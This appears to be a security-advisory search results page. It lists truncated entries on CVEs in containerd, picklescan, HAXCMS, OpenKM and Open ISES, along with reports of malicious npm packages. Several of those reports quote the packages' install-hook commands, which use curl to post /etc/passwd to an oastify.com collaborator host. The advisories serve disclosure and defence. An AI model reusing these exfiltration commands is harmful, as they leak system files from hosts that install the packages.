1121 matches found
Linux Distros Unpatched Vulnerability : CVE-2026-46680
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - containerd is an open-source container runtime. In versions prior to 1.7.32, 2.0.9, 2.2.4 and 2.3.1, containers launched with a numeric User directive that cann...
DEBIAN-CVE-2026-46680
containerd is an open-source container runtime. In versions prior to 1.7.32, 2.0.9, 2.2.4 and 2.3.1, containers launched with a numeric User directive that cannot be parsed as a 32-bit integer are incorrectly treated as a username, leading to runAsNonRoot evasion. If a crafted image provides an...
UBUNTU-CVE-2026-46680
containerd is an open-source container runtime. In versions prior to 1.7.32, 2.0.9, 2.2.4 and 2.3.1, containers launched with a numeric User directive that cannot be parsed as a 32-bit integer are incorrectly treated as a username, leading to runAsNonRoot evasion. If a crafted image provides an...
CVE-2026-46680 containerd user ID handling bypass allows runAsNonRoot evasion
containerd is an open-source container runtime. In versions prior to 1.7.32, 2.0.9, 2.2.4 and 2.3.1, containers launched with a numeric User directive that cannot be parsed as a 32-bit integer are incorrectly treated as a username, leading to runAsNonRoot evasion. If a crafted image provides an...
Malicious code in triage-bot (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2ef2bb10931626a345e1277463f9c2ec6ca36108c2d6131c9210707ea5692a64 package.json declares preinstall: node index.js, so the payload runs automatically on npm install with no user action. index.js requires os, fs, and...
CVE-2026-53872
picklescan before 0.0.35 contains an unsafe pickle deserialization vulnerability allowing unauthenticated attackers to read arbitrary server files by chaining io.FileIO and urllib.request.urlopen. Attackers can bypass RCE-focused blocklists to exfiltrate sensitive data like /etc/passwd to externa...
MAL-2026-5802 Malicious code in cardano-addresses-docs (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9d99ae2a620ac8a3db31cde344d6d1e46914f785b3d5f4b8debdb20d64fa9c75 package.json declares a preinstall hook node index.js that runs automatically on npm install. index.js collects host identifiers os.hostname,...
Debian dla-4556 : dovecot-auth-lua - security update
The remote Debian 11 host has packages installed that are affected by multiple vulnerabilities as referenced in the dla-4556 advisory. ------------------------------------------------------------------------- Debian LTS Advisory DLA-4556-1 [email protected]...
Malicious code in @easy-entry/outside-registration-fop-navigator (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b On npm install, package.json's postinstall hook executes node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...
MAL-2026-5428 Malicious code in @shell-cabinet/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad On npm install, the package's postinstall hook runs curl --data '@/etc/passwd' $hostname.200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the...
MAL-2026-5408 Malicious code in @easy-entry/landing-routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 16fd1aa3384490a5c01cbdc619bb61ea5fc70f853c8e8ed2e9836d2ca4617556 On npm install, the package's postinstall hook runs two exfiltration paths against an attacker-controlled Burp Collaborator endpoint. First,...
Malicious code in @easy-entry/landing-routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 16fd1aa3384490a5c01cbdc619bb61ea5fc70f853c8e8ed2e9836d2ca4617556 On npm install, the package's postinstall hook runs two exfiltration paths against an attacker-controlled Burp Collaborator endpoint. First,...
Malicious code in @open-banking/cabinet-providers (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 376acc0a3b29a3d768a5be7ea618329182989929f9e31fac8c176836b7c4b280 @open-banking/[email protected] is a dependency-confusion bait package anomalously high version under a generic scope that exfiltrates...
Medium: perl-Crypt-PasswdMD5
Issue Overview: Crypt::PasswdMD5 versions through 1.42 for Perl generates insecure random values for salts. The built-in rand function is predictable, and unsuitable for cryptography. CVE-2026-6659 Affected Packages: perl-Crypt-PasswdMD5 Issue Correction: Run dnf update perl-Crypt-PasswdMD5...
CVE-2026-46397 haxcms-php Local File Inclusion via saveOutline API Location Parameter v2.0
HAX CMS helps manage microsite universe with PHP or NodeJs backends. Prior to version 26.0.0, an Authenticated Local File Inclusion LFI vulnerability in the HAXCMS saveOutline endpoint allows a low-privileged user to read arbitrary files on the server by manipulating the location field written in...
[SECURITY] Fedora 43 Update: perl-Crypt-PasswdMD5-1.4.3-1.fc43
This package provides MD5-based crypt functions...
[SECURITY] Fedora 44 Update: perl-Crypt-PasswdMD5-1.4.3-1.fc44
This package provides MD5-based crypt functions...
CVE-2018-25398
The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the frmpasswd parameter. Attackers can send POST requests to main.php with crafted SQL payloads to extract sensitive...
PT-2026-44876
The Open ISES Project 3.30A contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the frm passwd parameter. Attackers can send POST requests to main.php with crafted SQL payloads to extract sensitive...
CVE-2026-41917 OpenKM 6.3.12 Local File Inclusion via Admin Scripting
OpenKM 6.3.12 contains a local file inclusion vulnerability in the administrative scripting interface at /admin/Scripting that allows authenticated administrators to read arbitrary files by supplying an attacker-controlled filesystem path through the fsPath parameter with action=Load. Attackers c...